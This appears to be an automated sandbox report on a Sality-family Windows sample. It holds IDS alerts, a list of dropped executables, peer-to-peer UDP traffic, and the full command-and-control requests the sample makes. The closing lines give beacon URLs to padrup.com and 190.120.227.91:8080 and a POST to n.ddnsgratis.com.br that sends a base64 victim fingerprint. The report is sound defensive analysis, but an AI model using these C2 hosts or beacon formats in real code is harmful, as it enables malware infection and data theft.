        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50007 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50007 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49721 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50035 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50035 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50057 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50055 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50062 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50062 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49977 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49740 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50048 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50054 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50054 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50058 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50058 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50048 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50047 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49955 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49955 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50044 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50060 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50060 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50046 -> 185.53.178.50:80
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: winxqvw.exe.1.dr
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: pityxd.exe.1.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: nimgtv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winbsswvu.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ypxuf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winclhyg.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: hqsb.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winfuyf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winixhla.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: unirvw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: wingyqbqr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: nyxrw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: lmto.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winpderh.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: kpmw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winsjay.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winlggu.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: qbcecv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winrbmrvn.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: rfnd.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winqhhdp.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winlakaf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winguwxpv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winglraj.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winidlrll.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: wincrely.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winbyxwrs.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winpggs.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ognr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winevrmk.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winruhhak.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: kyre.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winchbv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winiwxwcq.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: oktye.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: dliyqj.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ngpa.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: mlhr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: jnptrh.exe.10.dr
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: unknownNetwork traffic detected: IP country count 27
        Source: global trafficTCP traffic: 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: global trafficUDP traffic: 192.168.2.9:55596 -> 94.76.206.19:1473
        Source: global trafficUDP traffic: 192.168.2.9:55597 -> 46.45.148.196:5683
        Source: global trafficUDP traffic: 192.168.2.9:55598 -> 83.222.184.130:5750
        Source: global trafficUDP traffic: 192.168.2.9:55599 -> 58.140.114.152:5010
        Source: global trafficUDP traffic: 192.168.2.9:55600 -> 80.178.242.19:4630
        Source: global trafficUDP traffic: 192.168.2.9:60196 -> 61.95.152.112:6800
        Source: global trafficUDP traffic: 192.168.2.9:60197 -> 220.94.117.230:7066
        Source: global trafficUDP traffic: 192.168.2.9:60198 -> 58.85.93.82:4840
        Source: global trafficUDP traffic: 192.168.2.9:50097 -> 195.42.129.188:4876
        Source: global trafficUDP traffic: 192.168.2.9:50098 -> 81.180.90.149:9674
        Source: global trafficUDP traffic: 192.168.2.9:50099 -> 113.190.137.239:8112
        Source: global trafficUDP traffic: 192.168.2.9:50100 -> 89.45.97.101:4375
        Source: global trafficUDP traffic: 192.168.2.9:50101 -> 203.110.84.90:4882
        Source: global trafficUDP traffic: 192.168.2.9:50102 -> 121.243.130.85:6989
        Source: global trafficUDP traffic: 192.168.2.9:50103 -> 124.123.112.184:6219
        Source: global trafficUDP traffic: 192.168.2.9:50104 -> 121.135.15.57:4611
        Source: global trafficUDP traffic: 192.168.2.9:62327 -> 122.169.249.87:5878
        Source: global trafficUDP traffic: 192.168.2.9:62328 -> 183.83.119.156:6511
        Source: global trafficUDP traffic: 192.168.2.9:62329 -> 195.174.68.81:6296
        Source: global trafficUDP traffic: 192.168.2.9:62330 -> 77.81.225.89:6380
        Source: global trafficUDP traffic: 192.168.2.9:62331 -> 195.174.143.33:5960
        Source: global trafficUDP traffic: 192.168.2.9:62332 -> 117.239.49.110:5415
        Source: global trafficUDP traffic: 192.168.2.9:62333 -> 115.119.58.98:5310
        Source: global trafficUDP traffic: 192.168.2.9:62334 -> 93.114.177.116:4876
        Source: global trafficUDP traffic: 192.168.2.9:50175 -> 124.30.139.5:4294
        Source: global trafficUDP traffic: 192.168.2.9:60516 -> 95.64.101.42:5285
        Source: global trafficUDP traffic: 192.168.2.9:60517 -> 189.35.177.247:4490
        Source: global trafficUDP traffic: 192.168.2.9:60518 -> 95.76.49.203:4440
        Source: global trafficUDP traffic: 192.168.2.9:60519 -> 121.162.97.129:4900
        Source: global trafficUDP traffic: 192.168.2.9:60520 -> 115.98.98.230:5220
        Source: global trafficUDP traffic: 192.168.2.9:60521 -> 122.99.102.253:4980
        Source: global trafficUDP traffic: 192.168.2.9:60522 -> 77.81.224.130:7023
        Source: global trafficUDP traffic: 192.168.2.9:56722 -> 89.41.154.115:5038
        Source: global trafficUDP traffic: 192.168.2.9:56723 -> 89.45.96.223:5614
        Source: global trafficUDP traffic: 192.168.2.9:56724 -> 195.239.22.166:6065
        Source: global trafficUDP traffic: 192.168.2.9:56725 -> 188.215.26.241:6260
        Source: global trafficUDP traffic: 192.168.2.9:56726 -> 93.114.228.238:5959
        Source: global trafficUDP traffic: 192.168.2.9:56727 -> 46.248.223.58:5545
        Source: global trafficUDP traffic: 192.168.2.9:56728 -> 77.81.228.77:6130
        Source: global trafficUDP traffic: 192.168.2.9:56729 -> 77.81.228.140:5960
        Source: global trafficUDP traffic: 192.168.2.9:51188 -> 81.199.91.188:4980
        Source: global trafficUDP traffic: 192.168.2.9:51189 -> 190.111.22.45:6065
        Source: global trafficUDP traffic: 192.168.2.9:51190 -> 85.204.112.3:6244
        Source: global trafficUDP traffic: 192.168.2.9:51191 -> 183.83.90.202:5218
        Source: global trafficUDP traffic: 192.168.2.9:51192 -> 178.233.92.89:4980
        Source: global trafficUDP traffic: 192.168.2.9:51193 -> 196.201.129.61:5078
        Source: global trafficUDP traffic: 192.168.2.9:51194 -> 195.46.33.124:6538
        Source: global trafficUDP traffic: 192.168.2.9:51195 -> 94.55.239.88:5549
        Source: global trafficUDP traffic: 192.168.2.9:63759 -> 94.45.101.168:5141
        Source: global trafficUDP traffic: 192.168.2.9:63760 -> 89.44.211.209:5740
        Source: global trafficUDP traffic: 192.168.2.9:51128 -> 195.174.138.61:5636
        Source: global trafficUDP traffic: 192.168.2.9:51129 -> 77.122.97.232:5548
        Source: global trafficUDP traffic: 192.168.2.9:51130 -> 195.189.154.148:5549
        Source: global trafficUDP traffic: 192.168.2.9:51131 -> 122.169.104.90:7866
        Source: global trafficUDP traffic: 192.168.2.9:51132 -> 187.13.32.46:7866
        Source: global trafficUDP traffic: 192.168.2.9:51133 -> 195.189.209.77:6364
        Source: global trafficUDP traffic: 192.168.2.9:61218 -> 196.201.128.232:5376
        Source: global trafficUDP traffic: 192.168.2.9:61219 -> 14.46.86.152:8012
        Source: global trafficUDP traffic: 192.168.2.9:61220 -> 189.43.156.4:5285
        Source: global trafficUDP traffic: 192.168.2.9:61221 -> 86.55.89.177:8100
        Source: global trafficUDP traffic: 192.168.2.9:61222 -> 79.114.248.250:6780
        Source: global trafficUDP traffic: 192.168.2.9:61223 -> 195.144.14.69:6704
        Source: global trafficUDP traffic: 192.168.2.9:61224 -> 187.0.231.113:5293
        Source: global trafficUDP traffic: 192.168.2.9:61225 -> 85.122.42.91:6390
        Source: global trafficUDP traffic: 192.168.2.9:64328 -> 94.62.138.226:4596
        Source: global trafficUDP traffic: 192.168.2.9:64329 -> 95.64.85.169:6636
        Source: global trafficUDP traffic: 192.168.2.9:64330 -> 189.56.86.165:8032
        Source: global trafficUDP traffic: 192.168.2.9:64331 -> 201.92.253.229:6870
        Source: global trafficUDP traffic: 192.168.2.9:64332 -> 113.21.72.31:6832
        Source: global trafficUDP traffic: 192.168.2.9:64333 -> 89.34.99.99:6964
        Source: global trafficUDP traffic: 192.168.2.9:64334 -> 200.216.212.147:7866
        Source: global trafficUDP traffic: 192.168.2.9:64335 -> 77.81.232.22:5107
        Source: global trafficUDP traffic: 192.168.2.9:63317 -> 93.114.176.239:4570
        Source: global trafficUDP traffic: 192.168.2.9:63318 -> 124.123.92.252:7451
        Source: global trafficUDP traffic: 192.168.2.9:63319 -> 118.94.216.63:5708
        Source: global trafficUDP traffic: 192.168.2.9:50688 -> 183.83.188.123:6870
        Source: global trafficUDP traffic: 192.168.2.9:50912 -> 90.148.247.149:4410
        Source: global trafficUDP traffic: 192.168.2.9:57248 -> 183.82.146.144:6420
        Source: global trafficUDP traffic: 192.168.2.9:57249 -> 187.13.131.28:6832
        Source: global trafficUDP traffic: 192.168.2.9:57250 -> 211.107.173.111:7374
        Source: global trafficUDP traffic: 192.168.2.9:57251 -> 92.241.90.238:6373
        Source: global trafficUDP traffic: 192.168.2.9:64124 -> 188.26.1.21:4823
        Source: global trafficUDP traffic: 192.168.2.9:64125 -> 109.124.19.10:4770
        Source: global trafficUDP traffic: 192.168.2.9:64126 -> 217.219.117.8:7119
        Source: global trafficUDP traffic: 192.168.2.9:64127 -> 84.22.25.227:4343
        Source: global trafficUDP traffic: 192.168.2.9:64128 -> 27.3.6.5:8260
        Source: global trafficUDP traffic: 192.168.2.9:64129 -> 201.58.235.159:5372
        Source: global trafficUDP traffic: 192.168.2.9:64130 -> 183.82.176.250:5130
        Source: global trafficUDP traffic: 192.168.2.9:59472 -> 14.96.209.63:5734
        Source: global trafficUDP traffic: 192.168.2.9:62137 -> 93.94.54.35:4441
        Source: global trafficUDP traffic: 192.168.2.9:62138 -> 189.12.181.188:7119
        Source: global trafficUDP traffic: 192.168.2.9:62139 -> 193.140.107.175:8030
        Source: global trafficUDP traffic: 192.168.2.9:62140 -> 89.34.124.109:5684
        Source: global trafficUDP traffic: 192.168.2.9:62141 -> 196.200.62.20:5127
        Source: global trafficUDP traffic: 192.168.2.9:62142 -> 123.237.94.47:4579
        Source: global trafficUDP traffic: 192.168.2.9:62143 -> 178.22.169.142:6389
        Source: global trafficUDP traffic: 192.168.2.9:54339 -> 203.122.23.55:7046
        Source: global trafficUDP traffic: 192.168.2.9:54340 -> 89.32.53.124:5460
        Source: global trafficUDP traffic: 192.168.2.9:54341 -> 58.147.170.86:6554
        Source: global trafficUDP traffic: 192.168.2.9:54342 -> 196.20.112.81:6621
        Source: global trafficUDP traffic: 192.168.2.9:54343 -> 123.237.93.73:6500
        Source: global trafficUDP traffic: 192.168.2.9:54344 -> 27.2.3.124:5295
        Source: global trafficUDP traffic: 192.168.2.9:55361 -> 196.200.62.30:6455
        Source: global trafficUDP traffic: 192.168.2.9:58545 -> 124.125.109.155:5127
        Source: global trafficUDP traffic: 192.168.2.9:58546 -> 58.72.195.130:4900
        Source: global trafficUDP traffic: 192.168.2.9:58547 -> 151.56.26.254:8100
        Source: global trafficUDP traffic: 192.168.2.9:58548 -> 41.250.185.19:5446
        Source: global trafficUDP traffic: 192.168.2.9:55615 -> 178.123.176.220:6219
        Source: global trafficUDP traffic: 192.168.2.9:55616 -> 31.140.4.130:8804
        Source: global trafficUDP traffic: 192.168.2.9:55617 -> 93.113.189.169:5204
        Source: global trafficUDP traffic: 192.168.2.9:55618 -> 81.90.238.197:6195
        Source: global trafficUDP traffic: 192.168.2.9:55619 -> 212.150.50.138:5820
        Source: global trafficUDP traffic: 192.168.2.9:54924 -> 89.179.33.87:6130
        Source: global trafficUDP traffic: 192.168.2.9:54925 -> 200.241.176.189:5285
        Source: global trafficUDP traffic: 192.168.2.9:57680 -> 41.251.18.107:6840
        Source: global trafficUDP traffic: 192.168.2.9:57681 -> 78.106.189.148:40036
        Source: global trafficUDP traffic: 192.168.2.9:57682 -> 188.72.28.186:7617
        Source: global trafficUDP traffic: 192.168.2.9:57683 -> 59.99.50.127:4783
        Source: global trafficUDP traffic: 192.168.2.9:57684 -> 125.160.141.184:4510
        Source: global trafficUDP traffic: 192.168.2.9:57685 -> 85.186.185.172:5549
        Source: global trafficUDP traffic: 192.168.2.9:52345 -> 93.81.148.235:7368
        Source: global trafficUDP traffic: 192.168.2.9:52346 -> 78.97.126.19:6028
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49725 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49729 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49737 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49707 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49806 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49784 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49731 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49759 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49716 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49835 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49723 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49861 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49727 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49918 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49889 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49789 -> 190.120.227.91:8080
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9 -> 190.120.227.91:8080 (21 alerts, source ports 50039, 50037, 50045, 49899, 50056, 50043, 50028, 50041, 50050, 49983, 50030, 50033, 50052, 50007, 50035, 50062, 50048, 50054, 50058, 49955, 50060)
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9 -> 185.53.178.50:80 (23 alerts, source ports 50036, 50049, 50040, 50051, 50042, 49949, 50064, 50061, 50027, 50038, 50029, 50059, 50001, 50032, 50053, 50034, 49721, 50057, 50055, 49977, 49740, 50044, 50046)
Source: global traffic; HTTP traffic detected: GET /sobaka1.gif?<id>=<n> HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | Host: padrup.com | Cache-Control: no-cache. 40 such requests, with <id>=<n> in turn: 72f523=7533859, df9780=58613248, 7caa7d=57190763, cb36a4=13317796, 165b05c=164090500, 20c2a09=309164625, 2a61d79=222204765, 333df63=53731171, 3d3b9b1=192621843, 47aa66b=526028013, 50e8edc=169680312, 5b7e0de=767493872, 115dbf54=-1381402296, 11fef99e=-1275740116, 12ba214d=-2095650533, 13de3bbe=-1294984786, 1495f698=690744624, 1543ef95=713547562, 16b31880=-867443584, 1781559f=-1928855110, 18285ae2=405297890, 18b777d9=-977551672, 195904b8=425264312, 1a078ca7=-1238050671, 25bc9cf1=633117937, 269bb762=239207342, 27c85804=-957761516, 28892810=465574000, 2924596e=690248046, 29d43e7c=701775484, 2a6f2852=688527934, 2b0ab4f0=-684357456, 2bc60f28=-2091766408, 2e00e35c=-1979536876, 2ff37fd5=-1349550467, 311dbd80=1473261184, 31c7acfb=1551219421, 3269d32c=845796140, 331ed01f=-1728675592, 33c00681=914368262
Source: global traffic; HTTP traffic detected: GET /sobakavolos.gif?<id>=<n> HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | Host: 190.120.227.91:8080 | Cache-Control: no-cache. 38 such requests, alternating with the padrup.com ones, with <id>=<n> in turn: 74d2bd=76561250, 7d519a=82128900, eaa8c1=153786250, 18a856f=77566029, 22aca7d=145435124, 2c5425f=92964030, 352e846=390355434, 3ff2df5=201165279, 4991659=617132744, 542972c=882501560, 10d62ae4=564942280, 1176f212=293007890, 121e2607=-1559275969, 12d42dc2=947685702, 140deb53=-1939771579, 14b59e3b=1737234215, 15aba7b5=-659256046, 16d8692d=1149844359, 17a69eba=-1120602672, 1847fe9d=-1443367349, 18d65779=-1378065329, 19856214=856343592, 253429ca=1872526686, 25d5c2b0=-486371296, 270a0145=-2040263502, 27fe3552=-1611082424, 28a2e80b=-204378046, 2945db31=1244584328, 29f3e9f8=-1479563296, 2a895223=713642531, 2b436842=725837890, 2be56550=-1225394912, 2e54b34b=777302859, 308e5400=-443594752, 31430591=-1815539533, 31e7f67c=-1054365092, 328f1419=848237593, 3337cce9=1720097375
Source: global traffic; HTTP traffic detected: POST /n/tasks.php HTTP/1.0 | Host: n.ddnsgratis.com.br | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0 | Content-type: application/x-www-form-urlencoded | Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b | Content-length: 12 | Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a | Data Ascii: _wv=ZW50ZXI=
Source: global traffic; HTTP traffic detected: POST /n/tasks.php HTTP/1.0 | Host: n.ddnsgratis.com.br | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0 | Content-type: application/x-www-form-urlencoded | Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b | Content-length: 192 | Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a | Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU= (this POST is sent 4 times, spaced between the GET requests above)
